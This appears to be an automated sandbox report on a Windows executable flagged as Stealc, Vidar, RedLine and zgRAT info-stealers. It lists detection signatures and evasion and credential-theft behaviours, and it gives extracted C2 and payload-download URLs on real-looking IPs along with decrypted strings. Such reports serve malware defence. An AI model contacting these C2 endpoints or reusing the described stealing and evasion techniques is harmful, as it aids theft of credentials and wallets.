Windows Analysis Report
sx8RE6LbG0.exe

Overview

General Information

Sample name:	sx8RE6LbG0.exe renamed because original name is a hash value
Original sample name:	c4abdb03cdb7f5f76b4e83a208b222f0.exe
Analysis ID:	1433039
MD5:	c4abdb03cdb7f5f76b4e83a208b222f0
SHA1:	76e3f6bcd2bdf0048a5097a50f87e69a02c47521
SHA256:	9350faf52b3bd8f727cfe9385d176f28e1b11d5b79cb6574898043eea6a2a86a
Tags:	exeStealc
Infos:

Detection

Mars Stealer, PureLog Stealer, RedLine, SectopRAT, Stealc, Vidar, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Antivirus detection for dropped file

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic

Yara detected Mars stealer

Yara detected PureLog Stealer

Yara detected RedLine Stealer

Yara detected SectopRAT

Yara detected Stealc

Yara detected UAC Bypass using CMSTP

Yara detected Vidar stealer

Yara detected zgRAT

.NET source code contains method to dynamically call methods (often used by packers)

C2 URLs / IPs found in malware configuration

Checks if the current machine is a virtual machine (disk enumeration)

Connects to many ports of the same IP (likely port scanning)

Found direct / indirect Syscall (likely to bypass EDR)

Found evasive API chain (may stop execution after checking locale)

Found hidden mapped module (file has been removed from disk)

Found many strings related to Crypto-Wallets (likely being stolen)

Machine Learning detection for dropped file

Machine Learning detection for sample

Maps a DLL or memory area into another process

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Searches for specific processes (likely to inject)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Uses known network protocols on non-standard ports

Writes to foreign memory regions

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to create guard pages, often used to hinder reverse engineering and debugging

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to record screenshots

Contains functionality to retrieve information about pressed keystrokes

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found decision node followed by non-executed suspicious APIs

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

One or more processes crash

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries keyboard layouts

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the installation date of Windows

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Stores files to the Windows start menu directory

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
RedLine Stealer	RedLine Stealer is a malware available on underground forums for sale apparently as standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://apophis133.medium.com/redline-technical-analysis-report-5034e16ad152 https://asec.ahnlab.com/en/30445/ https://asec.ahnlab.com/en/35981/ https://asec.ahnlab.com/ko/25837/	https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html https://g0njxa.medium.com/approaching-stealers-devs-a-brief-interview-with-stealc-cbe5c94b84af	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Signatures

AV Detection

Antivirus detection for URL or domain

Source: http://185.172.128.59/syncUpd.exe	URL Reputation: Label: malware
Source: http://185.172.128.228/ping.php?substr=two	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\jipsoiol	Avira: detection malicious, Label: HEUR/AGEN.1307453
Source: C:\Users\user\AppData\Local\Temp\dvffdl	Avira: detection malicious, Label: HEUR/AGEN.1307453

Found malware configuration

Source: 00000002.00000003.2019835601.0000000003530000.00000004.00001000.00020000.00000000.sdmp	Malware Configuration Extractor: Vidar {"C2 url": "http://185.172.128.150/c698e1bc8a2f5e6d.php"}
Source: 00000002.00000002.2530252237.0000000001A5A000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.172.128.150/c698e1bc8a2f5e6d.php"}

Multi AV Scanner detection for domain / URL

Source: http://185.172.128.150/c698e1bc8a2f5e6d.php	Virustotal: Detection: 14%	Perma Link
Source: http://185.172.128.150/b7d0cfdb1d966bdd/softokn3.dll	Virustotal: Detection: 5%	Perma Link
Source: http://185.172.128.150/b7d0cfdb1d966bdd/vcruntime140.dll	Virustotal: Detection: 6%	Perma Link
Source: http://185.172.128.150/b7d0cfdb1d966bdd/freebl3.dll	Virustotal: Detection: 6%	Perma Link
Source: http://185.172.128.228/ping.php?substr=two	Virustotal: Detection: 18%	Perma Link
Source: http://185.172.128.150/c698e1bc8a2f5e6d.phpu	Virustotal: Detection: 7%	Perma Link
Source: http://185.172.128.150/b7d0cfdb1d966bdd/msvcp140.dll	Virustotal: Detection: 7%	Perma Link
Source: http://185.172.128.150/c698e1bc8a2f5e6d.phpy	Virustotal: Detection: 5%	Perma Link
Source: http://185.172.128.150/b7d0cfdb1d966bdd/mozglue.dll	Virustotal: Detection: 5%	Perma Link
Source: http://185.172.128.150/c698e1bc8a2f5e6d.phpv	Virustotal: Detection: 5%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\dvffdl	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\jipsoiol	ReversingLabs: Detection: 64%
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\UIxMarketPlugin.dll	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Roaming\SecureClient\UIxMarketPlugin.dll	ReversingLabs: Detection: 18%

Multi AV Scanner detection for submitted file

Source: sx8RE6LbG0.exe

Virustotal: Detection: 39%

Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\jipsoiol	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\dvffdl	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: sx8RE6LbG0.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: CtIvEWInDoW
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: AgEBOxw
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: ijklmnopqrs
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: /#%33@@@
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: abcdefghijklmnopqrs
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: @@@@<@@@
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: abcdefghijklmnopqrs
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: "&&""..""&&"">>""&&"".."ikSQWQSQ_QBEklmn^pqrBtuvFxyzL123H5679+/\|
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: %s\%V/yVs
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: %s\*.
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: }567y9n/S
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: ntTekeny
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: ging
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: PassMord0
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: J@@@`z`@J@@@J@@@
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: OPQRSTUVWXY
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: 456753+/---- '
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: '--- '
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: n\|
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: HeapFree
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: GetLocaleInfoA
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: ntProcessId
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: wininet.dll
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: shlwapi.dll
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: shell32.dll
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: .dll
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: column_text
Source: 2.2.u2ts.0.exe.400000.0.raw.unpack	String decryptor: login:

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00409540 CryptUnprotectData,LocalAlloc,LocalFree,	2_2_00409540
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_004155A0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,	2_2_004155A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_00406C10 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,	2_2_00406C10
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_004094A0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,	2_2_004094A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_0040BF90 memset,lstrlen,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,memcpy,lstrcat,lstrcat,PK11_FreeSlot,lstrcat,	2_2_0040BF90
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCBA9A0 PK11SDR_Decrypt,PORT_NewArena_Util,SEC_QuickDERDecodeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_GetInternalKeySlot,PK11_Authenticate,PORT_FreeArena_Util,PK11_ListFixedKeysInSlot,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_FreeSymKey,PORT_FreeArena_Util,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,	2_2_6BCBA9A0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCB43B0 PK11_PubEncryptPKCS1,PR_SetError,	2_2_6BCB43B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCE0180 SECMIME_DecryptionAllowed,SECOID_GetAlgorithmTag_Util,	2_2_6BCE0180
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCDA730 SEC_PKCS12AddCertAndKey,PORT_ArenaMark_Util,PORT_ArenaMark_Util,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,PK11_GetInternalKeySlot,PK11_FindKeyByAnyCert,SECKEY_DestroyPrivateKey,PORT_ArenaAlloc_Util,SECKEY_DestroyEncryptedPrivateKeyInfo,strlen,PR_SetError,PORT_FreeArena_Util,PORT_FreeArena_Util,PORT_ArenaAlloc_Util,PR_SetError,	2_2_6BCDA730
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC9E6E0 PK11_AEADOp,TlsGetValue,EnterCriticalSection,PORT_Alloc_Util,PK11_Encrypt,PORT_Alloc_Util,memcpy,memcpy,PR_SetError,PR_SetError,PR_Unlock,PR_SetError,PR_Unlock,PK11_Decrypt,PR_GetCurrentThread,PK11_Decrypt,PK11_Encrypt,memcpy,memcpy,PR_SetError,free,	2_2_6BC9E6E0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCBA650 PK11SDR_Encrypt,PORT_NewArena_Util,PK11_GetInternalKeySlot,PK11_Authenticate,SECITEM_ZfreeItem_Util,TlsGetValue,EnterCriticalSection,PR_Unlock,PK11_CreateContextBySymKey,PK11_GetBlockSize,PORT_Alloc_Util,memcpy,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PORT_ArenaAlloc_Util,PK11_CipherOp,SEC_ASN1EncodeItem_Util,SECITEM_ZfreeItem_Util,PORT_FreeArena_Util,PK11_DestroyContext,	2_2_6BCBA650
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC98670 PK11_ExportEncryptedPrivKeyInfo,	2_2_6BC98670
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BD025B0 PK11_Encrypt,memcpy,PR_SetError,PK11_Encrypt,	2_2_6BD025B0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCB44C0 PK11_PubEncrypt,	2_2_6BCB44C0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCB4440 PK11_PrivDecrypt,	2_2_6BCB4440
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC84420 SECKEY_DestroyEncryptedPrivateKeyInfo,memset,PORT_FreeArena_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,SECITEM_ZfreeItem_Util,free,	2_2_6BC84420
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCDDA40 SEC_PKCS7ContentIsEncrypted,	2_2_6BCDDA40
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCB9840 NSS_Get_SECKEY_EncryptedPrivateKeyInfoTemplate,	2_2_6BCB9840
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCB3850 PK11_Encrypt,TlsGetValue,EnterCriticalSection,SEC_PKCS12SetPreferredCipher,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_Unlock,TlsGetValue,EnterCriticalSection,PR_Unlock,PR_SetError,	2_2_6BCB3850
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCB3FF0 PK11_PrivDecryptPKCS1,	2_2_6BCB3FF0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BCD9EC0 SEC_PKCS12CreateUnencryptedSafe,PORT_ArenaMark_Util,PORT_ArenaAlloc_Util,PR_SetError,PR_SetError,SEC_PKCS7DestroyContentInfo,	2_2_6BCD9EC0
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Code function: 2_2_6BC97D60 PK11_ImportEncryptedPrivateKeyInfoAndReturnKey,SECOID_FindOID_Util,SECOID_FindOIDByTag_Util,PK11_PBEKeyGen,PK11_GetPadMechanism,PK11_UnwrapPrivKey,PK11_FreeSymKey,SECITEM_ZfreeItem_Util,PK11_PBEKeyGen,SECITEM_ZfreeItem_Util,PK11_FreeSymKey,PK11_ImportPublicKey,SECKEY_DestroyPublicKey,	2_2_6BC97D60
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_00254280 CreateFileW,GetLastError,GetFileSize,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,__allrem,ReadFile,CryptDecrypt,CloseHandle,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,CryptDestroyHash,CryptDestroyKey,CryptReleaseContext,	3_2_00254280
Source: C:\Users\user\AppData\Local\Temp\u2ts.2\run.exe	Code function: 3_2_002545A0 CryptAcquireContextW,CryptAcquireContextW,CryptAcquireContextW,CryptCreateHash,CryptHashData,CryptDestroyHash,CryptReleaseContext,CryptDeriveKey,CryptDestroyHash,CryptReleaseContext,	3_2_002545A0

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 3.2.run.exe.410ed5b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.556c264.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.run.exe.40ca86d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.run.exe.3903d5b.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.515de64.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.run.exe.38bf86d.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.5119976.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.556ce64.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.run.exe.390315b.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.2.cmd.exe.515d264.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.run.exe.410e15b.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.cmd.exe.5528976.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.2168931630.00000000040C3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2873386574.0000000005522000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.2613837016.0000000005113000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000016.00000002.2701306616.00000000038B8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: run.exe PID: 1408, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 6368, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: run.exe PID: 1396, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: cmd.exe PID: 1532, type: MEMORYSTR

Compliance

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe	Unpacked PE file: 0.2.sx8RE6LbG0.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\u2ts.0.exe	Unpacked PE file: 2.2.u2ts.0.exe.400000.0.unpack

Uses 32bit PE files

Source: sx8RE6LbG0.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Uses insecure TLS / SSL version for HTTPS connection

Source: unknown

HTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49715 version: TLS 1.0

Source: C:\Users\user\Desktop\sx8RE6LbG0.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: unknown

HTTPS traffic detected: 185.93.1.243:443 -> 192.168.2.5:49726 version: TLS 1.2

Source:	Binary string: mozglue.pdbP source: u2ts.0.exe, 00000002.00000002.2633247905.000000006BEDD000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: /_/obj/Release/Microsoft.ApplicationInsights/net46/Microsoft.ApplicationInsights.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3300059790.00000217322F0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: nss3.pdb@ source: u2ts.0.exe, 00000002.00000002.2630583484.000000006BD8F000.00000002.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\Workspace\TFS\MAINLINE\ioloCore\Dysnomia\PerceiveHUD\obj\Debug\PerceiveHUD.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3293149661.0000021731EA0000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3275975063.0000021729403000.00000004.00000800.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Cleanup\obj\Release\Cleanup.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296210614.0000021731FC0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Win32TaskScheduler\obj\Release\Win32TaskScheduler.pdbz9 source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\jizafova\bugu-44_jikeg_37\kisusilogeguw\rawubexuh.pdb source: sx8RE6LbG0.exe
Source:	Binary string: c:\release\WorkingDir\PrismLibraryBuild\PrismLibrary\Desktop\Prism\obj\Release\Microsoft.Practices.Prism.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3296762074.0000021732190000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: wntdll.pdb source: run.exe, 00000003.00000002.2169721590.0000000004A01000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169460946.0000000004550000.00000004.00000800.00020000.00000000.sdmp, run.exe, 00000003.00000002.2169111990.00000000041F6000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613691350.0000000004D68000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000004.00000002.2613947415.0000000005240000.00000004.00001000.00020000.00000000.sdmp, run.exe, 00000016.00000002.2706144763.000000000410D000.00000004.00000001.00020000.00000000.sdmp, run.exe, 00000016.00000002.2703363636.00000000039F1000.00000004.00000020.00020000.00000000.sdmp, run.exe, 00000016.00000002.2705188750.0000000003D50000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2871966588.000000000517A000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2873741315.0000000005650000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Bootstrap\obj\Release\Bootstrap.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\InstallerSMUDUI\obj\Release\InstallerSMUDUI.pdb\| source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3301005535.00000217324AB000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\STDHash\obj\Release\STDHash.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr
Source:	Binary string: mozglue.pdb source: u2ts.0.exe, 00000002.00000002.2633247905.000000006BEDD000.00000002.00000001.01000000.00000011.sdmp
Source:	Binary string: C:\Users\ICP221\perforce\_perforce\Installer\UniversalInstaller\2.5.30\Project\UIxStandard\Win\Release\UniversalInstaller.pdb source: run.exe, 00000003.00000000.2099921681.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000003.00000002.2166899823.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000016.00000000.2585114842.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe, 00000016.00000002.2691006504.000000000039C000.00000002.00000001.01000000.00000009.sdmp, run.exe.0.dr
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Telemetry\obj\Release\Telemetry.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.3318821153.0000021738120000.00000004.08000000.00040000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_de-de\obj\Release\Locale_de-de.pdb source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
Source:	Binary string: C:\Jenkins-Slave\workspace\sm\24.3\BuildTools\Bootstrap\Locale_pt-br\obj\Release\Locale_pt-br.pdb^ source: SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000000.2450353895.00000217170AB000.00000002.00000001.01000000.00000013.sdmp
